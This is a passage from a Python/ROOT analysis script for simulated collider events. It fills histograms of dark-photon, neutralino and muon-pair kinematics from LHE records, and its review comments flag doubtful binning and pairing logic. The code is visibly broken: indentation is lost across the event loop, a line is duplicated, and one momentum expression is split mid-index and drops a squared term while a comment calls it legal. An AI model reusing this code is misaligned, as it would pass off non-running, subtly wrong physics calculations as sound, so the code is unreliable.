h_dimuon_m_fake_0.SetLineStyle(1)
################################################################################
# mass of 2 selected dimuons
################################################################################
m_min = 0.2113
m_max = 3.5536
m_bins = 66
# 2D mass correlation of the two selected dimuon candidates.
h_m1_vs_m2 = ROOT.TH2F("h_m1_vs_m2", "h_m1_vs_m2", m_bins, m_min, m_max, m_bins, m_min, m_max)
h_m1_vs_m2.SetYTitle("m_{1#mu#mu} [GeV]")
h_m1_vs_m2.SetTitleOffset(1.3, "Y")
h_m1_vs_m2.SetXTitle("m_{2#mu#mu} [GeV]")
h_m1 = ROOT.TH1F("h_m1", "h_m1", 101, 0.1, 10.1)
h_m1.SetLineColor(ROOT.kRed)
h_m1.SetLineWidth(2)
h_m1.SetLineStyle(1)
h_m2 = ROOT.TH1F("h_m2", "h_m2", 101, 0.1, 10.1)
h_m2.SetYTitle("Events / 0.1 GeV")
h_m2.SetXTitle("m_{#mu#mu} [GeV]")
h_m2.SetTitleOffset(1.35, "Y")
h_m2.SetLineColor(ROOT.kBlue)
h_m2.SetLineWidth(2)
h_m2.SetLineStyle(1)
h_m2.SetMaximum(110000)
# Kinematics of the selected dimuon candidates ("_1" blue / "_2" red),
# with the usual axis-only "_dummy" histograms.
h_dimuon_1_pT_dummy = ROOT.TH1F("h_dimuon_1_pT_dummy", "h_dimuon_1_pT_dummy", 100, 0, 100)
h_dimuon_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pT_dummy.SetXTitle("p_{T} of #mu#mu [GeV]")
h_dimuon_1_pT_dummy.SetMaximum( 0.1 )
h_dimuon_1_pZ_dummy = ROOT.TH1F("h_dimuon_1_pZ_dummy", "h_dimuon_1_pZ_dummy", 100, 0, 100)
h_dimuon_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pZ_dummy.SetXTitle("|p_{Z}| of #mu#mu [GeV]")
h_dimuon_1_pZ_dummy.SetMaximum( 0.1 )
h_dimuon_1_Eta_dummy = ROOT.TH1F("h_dimuon_1_Eta_dummy", "h_dimuon_1_Eta_dummy",100,-5,5)
h_dimuon_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_dimuon_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Eta_dummy.SetXTitle("#eta of #mu#mu")
h_dimuon_1_Eta_dummy.SetMaximum( 0.1 )
h_dimuon_1_Phi_dummy = ROOT.TH1F("h_dimuon_1_Phi_dummy", "h_dimuon_1_Phi_dummy",80,-4,4 )
h_dimuon_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_dimuon_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Phi_dummy.SetXTitle("#phi of #mu#mu [rad]")
h_dimuon_1_Phi_dummy.SetMaximum( 0.05 )
h_dimuon_1_p_dummy = ROOT.TH1F("h_dimuon_1_p_dummy", "h_dimuon_1_p_dummy", 100, 0, 100)
h_dimuon_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_p_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_p_dummy.SetXTitle("p of #mu#mu [GeV]")
h_dimuon_1_p_dummy.SetMaximum( 0.1 )
# NOTE(review): 50 bins over (0.5, 10.005) gives a bin width of ~0.19 GeV,
# not the 0.2 GeV stated in the Y title — confirm the intended binning.
h_dimuon_1_M_dummy = ROOT.TH1F("h_dimuon_1_M_dummy", "h_dimuon_1_M_dummy", 50, 0.5, 10.005)
h_dimuon_1_M_dummy.SetYTitle("Fraction of events / 0.2 GeV")
h_dimuon_1_M_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_M_dummy.SetXTitle("Mass of #mu#mu [GeV]")
h_dimuon_1_M_dummy.SetMaximum( 1.4 )
h_dimuon_1_p = ROOT.TH1F("h_dimuon_1_p", "h_dimuon_1_p", 100, 0, 100)
h_dimuon_1_p.SetLineColor(ROOT.kBlue)
h_dimuon_1_p.SetLineWidth(2)
h_dimuon_1_p.SetLineStyle(1)
h_dimuon_1_M = ROOT.TH1F("h_dimuon_1_M", "h_dimuon_1_M", 500, 0.005, 10.005)
h_dimuon_1_M.SetLineColor(ROOT.kBlue)
h_dimuon_1_M.SetLineWidth(2)
h_dimuon_1_M.SetLineStyle(1)
h_dimuon_1_pT = ROOT.TH1F("h_dimuon_1_pT", "h_dimuon_1_pT", 100, 0, 100)
h_dimuon_1_pT.SetLineColor(ROOT.kBlue)
h_dimuon_1_pT.SetLineWidth(2)
h_dimuon_1_pT.SetLineStyle(1)
h_dimuon_1_pZ = ROOT.TH1F("h_dimuon_1_pZ", "h_dimuon_1_pZ", 100, 0, 100)
h_dimuon_1_pZ.SetLineColor(ROOT.kBlue)
h_dimuon_1_pZ.SetLineWidth(2)
h_dimuon_1_pZ.SetLineStyle(1)
h_dimuon_1_Eta = ROOT.TH1F("h_dimuon_1_Eta", "h_dimuon_1_Eta",100,-5,5)
h_dimuon_1_Eta.SetLineColor(ROOT.kBlue)
h_dimuon_1_Eta.SetLineWidth(2)
h_dimuon_1_Eta.SetLineStyle(1)
h_dimuon_1_Phi = ROOT.TH1F("h_dimuon_1_Phi", "h_dimuon_1_Phi", 80,-4,4)
h_dimuon_1_Phi.SetLineColor(ROOT.kBlue)
h_dimuon_1_Phi.SetLineWidth(2)
h_dimuon_1_Phi.SetLineStyle(1)
h_dimuon_2_p = ROOT.TH1F("h_dimuon_2_p", "h_dimuon_2_p", 100, 0, 100)
h_dimuon_2_p.SetLineColor(ROOT.kRed)
h_dimuon_2_p.SetLineWidth(2)
h_dimuon_2_p.SetLineStyle(1)
h_dimuon_2_pT = ROOT.TH1F("h_dimuon_2_pT", "h_dimuon_2_pT", 100, 0, 100)
h_dimuon_2_pT.SetLineColor(ROOT.kRed)
h_dimuon_2_pT.SetLineWidth(2)
h_dimuon_2_pT.SetLineStyle(1)
h_dimuon_2_pZ = ROOT.TH1F("h_dimuon_2_pZ", "h_dimuon_2_pZ", 100, 0, 100)
h_dimuon_2_pZ.SetLineColor(ROOT.kRed)
h_dimuon_2_pZ.SetLineWidth(2)
h_dimuon_2_pZ.SetLineStyle(1)
h_dimuon_2_Eta = ROOT.TH1F("h_dimuon_2_Eta", "h_dimuon_2_Eta", 100,-5,5)
h_dimuon_2_Eta.SetLineColor(ROOT.kRed)
h_dimuon_2_Eta.SetLineWidth(2)
h_dimuon_2_Eta.SetLineStyle(1)
h_dimuon_2_Phi = ROOT.TH1F("h_dimuon_2_Phi", "h_dimuon_2_Phi", 80,-4,4)
h_dimuon_2_Phi.SetLineColor(ROOT.kRed)
h_dimuon_2_Phi.SetLineWidth(2)
h_dimuon_2_Phi.SetLineStyle(1)
################################################################################
# BAM Functions
################################################################################
def plotOverflow(hist):
    """Draw *hist* normalized on the current pad with its overflow made visible.

    Builds a temporary histogram one bin wider than *hist*, copies the regular
    bins plus the overflow bin into it, and draws it with DrawNormalized("same").
    """
    name = hist.GetName()
    title = hist.GetTitle()
    nx = hist.GetNbinsX()+1          # one extra bin to hold the overflow
    x1 = hist.GetBinLowEdge(1)
    bw = hist.GetBinWidth(nx)
    x2 = hist.GetBinLowEdge(nx)+bw
    htmp = ROOT.TH1F(name, title, nx, x1, x2)
    # Copy bins 1..nx. Bin nx of the source IS its overflow bin, so the
    # overflow content now lands in the last visible bin of htmp.
    # Fixed: the loop previously stopped at range(1, nx) and never copied
    # the overflow bin, defeating the purpose of the widened axis.
    for i in range(1, nx+1):
        htmp.Fill(htmp.GetBinCenter(i), hist.GetBinContent(i))
    # NOTE(review): this folds the underflow (bin 0) in at the x-coordinate
    # GetNbinsX()-1, exactly as the original code did — an x value, not a bin
    # index. Confirm the intent before relying on the underflow display.
    htmp.Fill(hist.GetNbinsX()-1, hist.GetBinContent(0))
    htmp.SetEntries(hist.GetEntries())
    htmp.SetLineColor(hist.GetLineColor())
    htmp.SetLineWidth(hist.GetLineWidth())
    htmp.SetLineStyle(hist.GetLineStyle())
    htmp.DrawNormalized("same")
    return
def integral(hist):
    """Approximate the area under *hist*.

    Uses a single fixed bin width (the width of bin GetNbinsX()+1) and sums
    the contents of bins 0 through GetNbinsX() inclusive — i.e. the underflow
    bin is included, the overflow bin is not.
    """
    n_bins = hist.GetNbinsX()
    bin_width = hist.GetBinWidth(n_bins + 1)
    return sum(bin_width * hist.GetBinContent(i) for i in range(n_bins + 1))
def getEta(pz, p):
    """Return the pseudorapidity for longitudinal momentum *pz* and total
    momentum *p*, i.e. eta = atanh(pz/p)."""
    return atanh(pz / p)
def scaleAxisY(hist, dummy):
    """Set *dummy*'s y-axis maximum to 1.8x the tallest bin of *hist*
    after unit-area normalization (leaves headroom above the peak)."""
    norm = hist.Integral()
    peak_fraction = hist.GetBinContent(hist.GetMaximumBin()) / norm
    dummy.SetMaximum(1.8 * peak_fraction)
def scaleAxisYcT(hist, dummy):
    """Like scaleAxisY, but normalizes by the module-level integral() helper
    (fixed-bin-width area) instead of hist.Integral()."""
    norm = integral(hist)
    peak_fraction = hist.GetBinContent(hist.GetMaximumBin()) / norm
    dummy.SetMaximum(1.8 * peak_fraction)
################################################################################
# Loop over events
################################################################################
nEvents = 0       # number of <event> blocks seen so far in the LHE file
isEvent = False   # True while the parser is inside an <event>...</event> block
nEventsOK = 0     # NOTE(review): incremented elsewhere in the loop — confirm usage
for line in f:
if line == '<event>\n':
isEvent = True
isEvent = True
nEvents = nEvents + 1
nLinesInEvent = 0
nParticlesInEvent = 0
muons = []
dimuons = []
DimuonIndex1 = []
DimuonIndex2 = []
bamDimuons = []
FakeIndex1 = []
FakeIndex2 = []
FakeDimuons = []
lifetimes = []
higgs = []
neutralinos = []
darkNeutralinos = []
gammaDs = []
n1PlotCounter = 0
gammaDPlotCounter = 0
nDPlotCounter = 0
if nEvents > nExit: break
continue
if line == '</event>\n':
isEvent = False
continue
if isEvent == True:
nLinesInEvent = nLinesInEvent + 1
#***************************************************************************
# first line with common event information
#***************************************************************************
if nLinesInEvent == 1:
word_n = 0
# print "I", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: NUP = int(word) # number of particles in the event
if word_n == 2: IDPRUP = int(word) # process type
if word_n == 3: XWGTUP = float(word) # event weight
if word_n == 4: SCALUP = float(word) # factorization scale Q
if word_n == 5: AQEDUP = float(word) # the QED coupling alpha_em
if word_n == 6: AQCDUP = float(word) # the QCD coupling alpha_s
if word_n > 6: print "Warning! Wrong common event information", line
#***************************************************************************
# line with particle information
#***************************************************************************
if nLinesInEvent >= 2:
nParticlesInEvent = nParticlesInEvent + 1
word_n = 0
# print "P", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: IDUP = int(word) # particle PDG identity code
if word_n == 2: ISTUP = int(word) # status code
if word_n == 3: MOTHUP1 = int(word) # position of the first mother of particle
if word_n == 4: MOTHUP2 = int(word) # position of the last mother of particle
if word_n == 5: ICOLUP1 = int(word) # tag for the colour flow info
if word_n == 6: ICOLUP2 = int(word) # tag for the colour flow info
if word_n == 7: PUP1 = float(word) # px in GeV
if word_n == 8: PUP2 = float(word) # py in GeV
if word_n == 9: PUP3 = float(word) # pz in GeV
if word_n == 10: PUP4 = float(word) # E in GeV
if word_n == 11: PUP5 = float(word) # m in GeV
if word_n == 12: VTIMUP = float(word) # invariant lifetime ctau in mm
if word_n == 13: SPINUP = float(word) # cosine of the angle between the spin vector of a particle and its three-momentum
if word_n > 13: print "Warning! Wrong particle line", line
if abs(IDUP) == muonID:
if IDUP > 0: q = -1
if IDUP < 0: q = 1
v4 = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
muons.append(( q, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi(), MOTHUP1 ))
if abs(IDUP) == higgsID:
if IDUP > 0: q = 0
if IDUP < 0: q = 0
vHiggs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
higgs.append((q, vHiggs.Px(), vHiggs.Py(), vHiggs.Pz(), vHiggs.E(), vHiggs.M(), vHiggs.Pt(), vHiggs.Eta(), vHiggs.Phi() ))
h_higgs_pT.Fill( higgs[len(higgs)-1][6] )
h_higgs_M.Fill( higgs[len(higgs)-1][5] )
h_higgs_p.Fill( sqrt( higgs[len(higgs)-1][1]*higgs[len(higgs)-1][1] + higgs[len(higgs)-1][2]*higgs[len(higgs)-1][2] + higgs[len(higgs)-1][3]*higgs[len(higgs)-1][3] ) )
h_higgs_pZ.Fill( fabs(higgs[len(higgs)-1][3]) )
#h_higgs_Eta.Fill( higgs[len(higgs)-1][7] )
h_higgs_Phi.Fill( higgs[len(higgs)-1][8] )
# Neutralino (n1) branch: buffer each neutralino's kinematics; once both
# are collected, fill the per-event histograms exactly once (guarded by
# n1PlotCounter).
if abs(IDUP) == n1ID:
q = 0
vNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
neutralinos.append((q, vNeutralino.Px(), vNeutralino.Py(), vNeutralino.Pz(), vNeutralino.E(), vNeutralino.M(), vNeutralino.Pt(), vNeutralino.Eta(), vNeutralino.Phi() ))
if len(neutralinos) == 2 and n1PlotCounter == 0:
# pT-order (tuple index 6 = pT) so [0] is the leading neutralino.
neutralinos_sorted_pT = sorted(neutralinos, key=itemgetter(6), reverse=True)
neutralinos = neutralinos_sorted_pT
h_n1_1_pT.Fill( neutralinos[0][6] )
h_n1_2_pT.Fill( neutralinos[1][6] )
h_n1_1_p.Fill( sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ) )
h_n1_2_p.Fill( sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] ) )
# NOTE(review): both masses go into h_n1_1_M (h_n1_2_M is commented out in
# the drawing section) -- looks deliberate, but confirm.
h_n1_1_M.Fill( neutralinos[0][5] )
h_n1_1_M.Fill( neutralinos[1][5] )
h_n1_1_pZ.Fill( fabs(neutralinos[0][3]) )
h_n1_2_pZ.Fill( fabs(neutralinos[1][3]) )
# Eta is recomputed from pz and |p| via the local getEta helper rather than
# taken from the stored TLorentzVector eta (tuple index 7).
h_n1_1_Eta.Fill( getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))) )
h_n1_1_Phi.Fill( neutralinos[0][8] )
h_n1_2_Eta.Fill( getEta(neutralinos[1][3], sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] )) )
#print "PUP3, PZ, P, ETA:"
#print neutralinos[0][7]
#print neutralinos[0][3]
#print (sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))
#print getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] )))
h_n1_2_Phi.Fill( neutralinos[1][8] )
n1PlotCounter = 1
# Dark neutralino (nD) branch: same buffering pattern as the n1 branch
# above, plus a missing-transverse-energy fill from the nD pair.
if abs(IDUP) == nDID:
q = 0
vDarkNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
darkNeutralinos.append((q, vDarkNeutralino.Px(), vDarkNeutralino.Py(), vDarkNeutralino.Pz(), vDarkNeutralino.E(), vDarkNeutralino.M(), vDarkNeutralino.Pt(), vDarkNeutralino.Eta(), vDarkNeutralino.Phi() ))
if len(darkNeutralinos) == 2 and nDPlotCounter == 0:
# pT-order (tuple index 6 = pT).
darkNeutralinos_sorted_pT = sorted(darkNeutralinos, key=itemgetter(6), reverse=True)
darkNeutralinos = darkNeutralinos_sorted_pT
h_nD_1_pT.Fill( darkNeutralinos[0][6] )
h_nD_2_pT.Fill( darkNeutralinos[1][6] )
h_nD_1_p.Fill( sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] ) )
h_nD_2_p.Fill( sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1][2]*darkNeutralinos[1][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] ) )
# NOTE(review): both masses fill h_nD_1_M (h_nD_2_M is commented out in the
# drawing section) -- looks deliberate, but confirm.
h_nD_1_M.Fill( darkNeutralinos[0][5] )
h_nD_1_M.Fill( darkNeutralinos[1][5] )
h_nD_1_pZ.Fill( fabs(darkNeutralinos[0][3]) )
h_nD_2_pZ.Fill( fabs(darkNeutralinos[1][3]) )
h_nD_1_Eta.Fill( getEta(darkNeutralinos[0][3], sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] )) )
h_nD_1_Phi.Fill( darkNeutralinos[0][8] )
# Line continuation below is legal: the expression is split inside the
# sqrt(...) parentheses.
h_nD_2_Eta.Fill( getEta(darkNeutralinos[1][3], sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1
][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] )) )
h_nD_2_Phi.Fill( darkNeutralinos[1][8] )
# NOTE(review): vectorSum is (sum px)^2 + (sum py)^2, i.e. the SQUARED
# transverse momentum of the nD pair -- no sqrt is taken before filling
# Etmiss. Confirm whether the histogram is meant to hold MET or MET^2.
vectorSum =( ( darkNeutralinos[0][1] + darkNeutralinos[1][1] )*( darkNeutralinos[0][1] + darkNeutralinos[1][1] ) ) + ( (darkNeutralinos[0][2] + darkNeutralinos[1][2])*(darkNeutralinos[0][2] + darkNeutralinos[1][2]) )
Etmiss.Fill(vectorSum)
nDPlotCounter = 1
# Dark photon (gammaD) branch. VTIMUP is the particle's proper lifetime
# c*tau from the LHE record (units assumed mm -- TODO confirm against the
# generator settings).
if abs(IDUP) == gammaDID:
q = 0
vgammaDs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
gammaDs.append(( q, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.E(), vgammaDs.M(), vgammaDs.Pt(), vgammaDs.Eta(), vgammaDs.Phi()))
h_gammaD_cT.Fill( VTIMUP )
# Boost the proper lifetime into the lab frame:
# beta = p/E = p/sqrt(M^2 + p^2), gamma = 1/sqrt(1 - beta^2), L = gamma*ctau.
pmom = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() + vgammaDs.Pz()*vgammaDs.Pz() )
beta = pmom/(sqrt(vgammaDs.M()*vgammaDs.M() + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_cT_lab.Fill( lorentz*VTIMUP )
# Same construction using only the transverse momentum (XY projection).
pmomxy = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() )
betaxy = pmomxy/sqrt( vgammaDs.M()*vgammaDs.M() + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_cT_XY_lab.Fill( lorentzxy*VTIMUP )
# Same construction using only the longitudinal (Z) momentum.
pmomz = sqrt( vgammaDs.Pz()*vgammaDs.Pz() )
betaz = pmomz/sqrt( vgammaDs.M()*vgammaDs.M() + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_cT_Z_lab.Fill( lorentzZ * VTIMUP )
# Keep (ctau, px, py, pz, pT, M) so the pT-sorted per-event plots below can
# recompute the boosts after ordering.
lifetimes.append( (VTIMUP, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.Pt(), vgammaDs.M() ))
if len(gammaDs) == 2 and gammaDPlotCounter == 0:
# Order both dark photons and their lifetime records by pT
# (gammaDs index 6 and lifetimes index 4 both hold pT).
gammaDs_sorted_pT = sorted(gammaDs, key=itemgetter(6), reverse=True)
gammaDs = gammaDs_sorted_pT
lifetimes_sorted_pT = sorted(lifetimes, key=itemgetter(4), reverse=True)
lifetimes = lifetimes_sorted_pT
# Leading-pT dark photon: rest-frame ctau plus full / XY / Z lab boosts.
h_gammaD_1_cT.Fill( lifetimes[0][0] )
pmom = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] + lifetimes[0][3]*lifetimes[0][3] )
beta = pmom/(sqrt(lifetimes[0][5]*lifetimes[0][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_1_cT_lab.Fill( lorentz*lifetimes[0][0] )
#print "pmom, beta, lorentz"
#print pmom
#print beta
#print lorentz
#print lorentz*lifetimes[0][0]
pmomxy = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] )
betaxy = pmomxy/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_1_cT_XY_lab.Fill( lorentzxy*lifetimes[0][0] )
pmomz = sqrt( lifetimes[0][3]*lifetimes[0][3] )
betaz = pmomz/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_1_cT_Z_lab.Fill( lorentzZ * lifetimes[0][0] )
# Sub-leading dark photon: identical set of fills.
h_gammaD_2_cT.Fill( lifetimes[1][0] )
pmom = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] + lifetimes[1][3]*lifetimes[1][3] )
beta = pmom/(sqrt(lifetimes[1][5]*lifetimes[1][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_2_cT_lab.Fill( lorentz*lifetimes[1][0] )
pmomxy = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] )
betaxy = pmomxy/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_2_cT_XY_lab.Fill( lorentzxy*lifetimes[1][0] )
pmomz = sqrt( lifetimes[1][3]*lifetimes[1][3] )
betaz = pmomz/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_2_cT_Z_lab.Fill( lorentzZ * lifetimes[1][0] )
# Kinematic distributions of the two pT-ordered dark photons.
h_gammaD_1_pT.Fill( gammaDs[0][6] )
h_gammaD_2_pT.Fill( gammaDs[1][6] )
h_gammaD_1_p.Fill( sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) )
h_gammaD_2_p.Fill( sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) )
# NOTE(review): both masses fill h_gammaD_1_M, matching the n1/nD pattern
# above -- confirm intended.
h_gammaD_1_M.Fill( gammaDs[0][5] )
h_gammaD_1_M.Fill( gammaDs[1][5] )
h_gammaD_1_pZ.Fill( fabs(gammaDs[0][3]) )
h_gammaD_2_pZ.Fill( fabs(gammaDs[1][3]) )
h_gammaD_1_Eta.Fill( getEta(gammaDs[0][3], sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) ) )
h_gammaD_1_Phi.Fill( gammaDs[0][8] )
h_gammaD_2_Eta.Fill( getEta(gammaDs[1][3], sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) ) )
h_gammaD_2_Phi.Fill( gammaDs[1][8] )
gammaDPlotCounter = 1
# Four-muon block: runs once all four final-state muons of the event have
# been collected. Fills single-muon kinematics, then builds the two "real"
# dimuons (same-parent pairs) and two "fake" dimuons (cross-parent,
# opposite-charge pairs) for the mass/kinematics plots.
if len(muons) == 4:
# pT-order the muons (tuple index 6 = pT); index 0 is the leading muon.
muons_sorted_pT = sorted(muons, key=itemgetter(6), reverse=True)
muons = muons_sorted_pT
h_muon_pT_0.Fill( muons[0][6] )
h_muon_pT_1.Fill( muons[1][6] )
h_muon_pT_2.Fill( muons[2][6] )
h_muon_pT_3.Fill( muons[3][6] )
h_muon_eta_0.Fill( muons[0][7] )
h_muon_eta_1.Fill( muons[1][7] )
h_muon_eta_2.Fill( muons[2][7] )
h_muon_eta_3.Fill( muons[3][7] )
h_muon_phi_0.Fill( muons[0][8] )
h_muon_phi_1.Fill( muons[1][8] )
h_muon_phi_2.Fill( muons[2][8] )
h_muon_phi_3.Fill( muons[3][8] )
h_muon_p_0.Fill( sqrt( muons[0][1]*muons[0][1] + muons[0][2]*muons[0][2] + muons[0][3]*muons[0][3] ) )
h_muon_p_1.Fill( sqrt( muons[1][1]*muons[1][1] + muons[1][2]*muons[1][2] + muons[1][3]*muons[1][3] ) )
h_muon_p_2.Fill( sqrt( muons[2][1]*muons[2][1] + muons[2][2]*muons[2][2] + muons[2][3]*muons[2][3] ) )
h_muon_p_3.Fill( sqrt( muons[3][1]*muons[3][1] + muons[3][2]*muons[3][2] + muons[3][3]*muons[3][3] ) )
h_muon_pZ_0.Fill( muons[0][3] )
h_muon_pZ_1.Fill( muons[1][3] )
h_muon_pZ_2.Fill( muons[2][3] )
h_muon_pZ_3.Fill( muons[3][3] )
# Tuple index 9 appears to hold the mother-particle reference from the LHE
# record (TODO confirm); muons sharing it come from the same dark photon.
parent = muons[1][9] #this is an arbitrary choice to find real dimuons
for i in range(0, len(muons) ):
if parent == muons[i][9]:
DimuonIndex1.append(i)
else:
DimuonIndex2.append(i)
# Sum the 4-vectors of each same-parent pair to build the two real dimuons.
px1 = muons[DimuonIndex1[0]][1] + muons[DimuonIndex1[1]][1]
py1 = muons[DimuonIndex1[0]][2] + muons[DimuonIndex1[1]][2]
pz1 = muons[DimuonIndex1[0]][3] + muons[DimuonIndex1[1]][3]
e1 = muons[DimuonIndex1[0]][4] + muons[DimuonIndex1[1]][4]
px2 = muons[DimuonIndex2[0]][1] + muons[DimuonIndex2[1]][1]
py2 = muons[DimuonIndex2[0]][2] + muons[DimuonIndex2[1]][2]
pz2 = muons[DimuonIndex2[0]][3] + muons[DimuonIndex2[1]][3]
e2 = muons[DimuonIndex2[0]][4] + muons[DimuonIndex2[1]][4]
bamV4_1 = ROOT.TLorentzVector(px1, py1, pz1, e1)
bamV4_2 = ROOT.TLorentzVector(px2, py2, pz2, e2)
# Dimuon tuples: (px, py, pz, E, M, pT, eta, phi) -- note mass is index 4
# and pT is index 5 here (different layout from the muon tuples).
bamDimuons.append(( bamV4_1.Px(), bamV4_1.Py(), bamV4_1.Pz(), bamV4_1.E(), bamV4_1.M(), bamV4_1.Pt(), bamV4_1.Eta(), bamV4_1.Phi() ))
bamDimuons.append(( bamV4_2.Px(), bamV4_2.Py(), bamV4_2.Pz(), bamV4_2.E(), bamV4_2.M(), bamV4_2.Pt(), bamV4_2.Eta(), bamV4_2.Phi() ))
# Order by invariant mass for the mass plots...
bamDimuons_Sorted_M = sorted(bamDimuons, key=itemgetter(4), reverse=True)
bamDimuons = bamDimuons_Sorted_M
h_m1_vs_m2.Fill(bamDimuons[0][4],bamDimuons[1][4])
h_m1.Fill(bamDimuons[0][4])
h_m2.Fill(bamDimuons[1][4])
# ...then re-order by pT for the momentum/angle plots.
bamDimuons_Sorted_pT = sorted(bamDimuons, key=itemgetter(5), reverse=True)
bamDimuons = bamDimuons_Sorted_pT
h_dimuon_1_pT.Fill(bamDimuons[0][5])
h_dimuon_2_pT.Fill(bamDimuons[1][5])
h_dimuon_1_pZ.Fill(bamDimuons[0][2])
h_dimuon_2_pZ.Fill(bamDimuons[1][2])
h_dimuon_1_p.Fill(sqrt( bamDimuons[0][0]*bamDimuons[0][0] + bamDimuons[0][1]*bamDimuons[0][1] + bamDimuons[0][2]*bamDimuons[0][2] ))
h_dimuon_2_p.Fill(sqrt( bamDimuons[1][0]*bamDimuons[1][0] + bamDimuons[1][1]*bamDimuons[1][1] + bamDimuons[1][2]*bamDimuons[1][2] ))
h_dimuon_1_Eta.Fill(bamDimuons[0][6])
h_dimuon_2_Eta.Fill(bamDimuons[1][6])
h_dimuon_1_Phi.Fill(bamDimuons[0][7])
h_dimuon_2_Phi.Fill(bamDimuons[1][7])
# Fake dimuons: pair the reference muon (index 1) with an opposite-charge
# muon from the OTHER parent, i.e. a deliberately wrong combinatorial pairing.
parent = muons[1][9] #this is an arbitrary choice to find the fake dimuons
charge = muons[1][0]
for i in range(0, len(muons) ):
if parent != muons[i][9] and charge != muons[i][0]:
FakeIndex1.append(i)
# NOTE(review): this appends the reference muon's index (1) alongside each
# match; if more than one muon satisfies the condition, FakeIndex1 grows
# past two entries -- confirm exactly one match is guaranteed per event.
FakeIndex1.append(1)
# The remaining two muons form the second fake pair.
for j in range(0, len(muons) ):
if j != FakeIndex1[0] and j != FakeIndex1[1]:
FakeIndex2.append(j)
Fakepx1 = muons[FakeIndex1[0]][1] + muons[FakeIndex1[1]][1]
Fakepy1 = muons[FakeIndex1[0]][2] + muons[FakeIndex1[1]][2]
Fakepz1 = muons[FakeIndex1[0]][3] + muons[FakeIndex1[1]][3]
